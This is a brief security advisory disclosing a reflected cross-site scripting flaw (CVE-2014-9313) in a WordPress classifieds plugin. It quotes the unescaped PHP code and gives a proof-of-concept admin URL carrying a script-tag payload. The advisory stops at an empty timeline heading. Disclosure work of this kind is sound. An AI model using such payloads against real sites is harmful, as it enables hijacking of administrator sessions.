Another WordPress Classifieds Plugin 3.3.1 Reflected XSS

Homepage:

https://wordpress.org/plugins/another-wordpress-classifieds-plugin/

CVE-ID

CVE-2014-9313

CVSS Score

4

CVSS Vector

(AV:N/AC:L/Au:S/C:P/I:N/A:N)

Description:

$_GET['error_message'] is not escaped.

File: another-wordpress-classifieds-plugin\admin\admin-panel-settings.php

if ( isset( $_GET['code_error'] ) && isset( $_GET['error_message'] )  ) {
	$errors[] = sprintf( __( 'AWPCP could not obtain a valid access token from Facebook: %s', 'AWPCP' ), $_GET['error_message'] );
} else if ( isset( $_GET['code_error'] ) ) {
	$errors[] = __( 'AWPCP could not obtain a valid access token from Facebook. Please try again.', 'AWPCP' );
}

Proof of Concept:

XSS will be visible for admin:

http://wordpress-install/wp-admin/admin.php?page=awpcp-admin-settings&g=facebook-settings&code_error=1&error_message=<script>alert(String.fromCharCode(88,83,83));</script>

Timeline: